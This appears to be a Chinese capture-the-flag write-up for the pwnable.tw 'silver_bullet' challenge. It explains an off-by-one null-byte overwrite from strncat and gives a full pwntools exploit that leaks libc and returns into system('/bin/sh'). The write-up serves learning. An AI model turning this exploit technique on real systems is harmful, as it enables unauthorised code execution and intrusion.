标签:line fir read print col RoCE 添加 bullet rac
产生漏洞的原因
int __cdecl power_up(char *dest) { char s; // [esp+0h] [ebp-34h] size_t new_len; // [esp+30h] [ebp-4h] new_len = 0; memset(&s, 0, 0x30u); if ( !*dest ) return puts("You need create the bullet first !"); if ( *((_DWORD *)dest + 12) > 47u ) // len>47 return puts("You can‘t power up any more !"); printf("Give me your another description of bullet :"); read_input(&s, 48 - *((_DWORD *)dest + 12)); strncat(dest, &s, 48 - *((_DWORD *)dest + 12));// strncat会在dest结尾添加\0结束符,而记录字符串长度的位置正好位于s+0x30的位置, // s+0x30在strncat添加字符串长度为0x30时会被覆盖为0 new_len = strlen(&s) + *((_DWORD *)dest + 12);// s+0x30被覆盖为0后new_len变为附加字符串的长度 printf("Your new power is : %u\n", new_len); *((_DWORD *)dest + 12) = new_len; return puts("Enjoy it !"); }
脚本
from pwn import *
context.log_level=‘DEBUG‘
r=remote(‘chall.pwnable.tw‘,10103)
file=ELF(‘./silver_bullet‘)
libc=ELF(‘./libc_32.so.6‘)
‘‘‘
r=process(‘./silver_bullet‘)
file=ELF(‘./silver_bullet‘)
libc=ELF(‘/lib/i386-linux-gnu/libc-2.28.so‘)
‘‘‘
#trigger stack overflow
r.recvuntil(‘Your choice :‘)
r.sendline(‘1‘)
r.recvuntil(‘Give me your description of bullet :‘)
r.send(‘a‘*47)
r.sendline(‘2‘)
r.recvuntil(‘Give me your another description of bullet :‘)
r.send(‘b‘)
#gdb.attach(r)
#leak libc
r.recvuntil(‘Your choice :‘)
r.sendline(‘2‘)
r.recvuntil(‘Give me your another description of bullet :‘)
start=0x080484F0
payload=‘\xff‘*3+p32(0xdeadbeaf)+p32(file.plt[‘puts‘])+p32(start)+p32(file.got[‘puts‘])
payload+=(47-len(payload))*‘a‘
r.send(payload)
r.recvuntil(‘Your choice :‘)
r.sendline(‘3‘)
r.recvuntil(‘Oh ! You win !!\n‘)
libc_base=u32(r.recv(4))-libc.sym[‘puts‘]
success(‘libc_base:‘+hex(libc_base))
sys_addr=libc_base+libc.sym[‘system‘]
binsh_addr=libc_base+libc.search(‘/bin/sh‘).next()
success(‘binsh_addr‘+hex(binsh_addr))
#gdb.attach(r)
#trigger stack overflow again
r.recvuntil(‘Your choice :‘)
r.sendline(‘1‘)
r.recvuntil(‘Give me your description of bullet :‘)
r.send(‘a‘*47)
r.sendline(‘2‘)
r.recvuntil(‘Give me your another description of bullet :‘)
r.send(‘b‘)
#trigger system(‘/bin/sh‘) call
r.recvuntil(‘Your choice :‘)
r.sendline(‘2‘)
r.recvuntil(‘Give me your another description of bullet :‘)
payload1=‘\xff‘*3+p32(0xdeadbeaf)+p32(sys_addr)+p32(0xdeadbeaf)+p32(binsh_addr)
payload1+=(47-len(payload))*‘a‘
r.send(payload1)
r.recvuntil(‘Your choice :‘)
r.sendline(‘3‘)
r.recvuntil(‘Oh ! You win !!\n‘)
r.interactive()
标签:line fir read print col RoCE 添加 bullet rac
原文地址:https://www.cnblogs.com/snip3r/p/10628682.html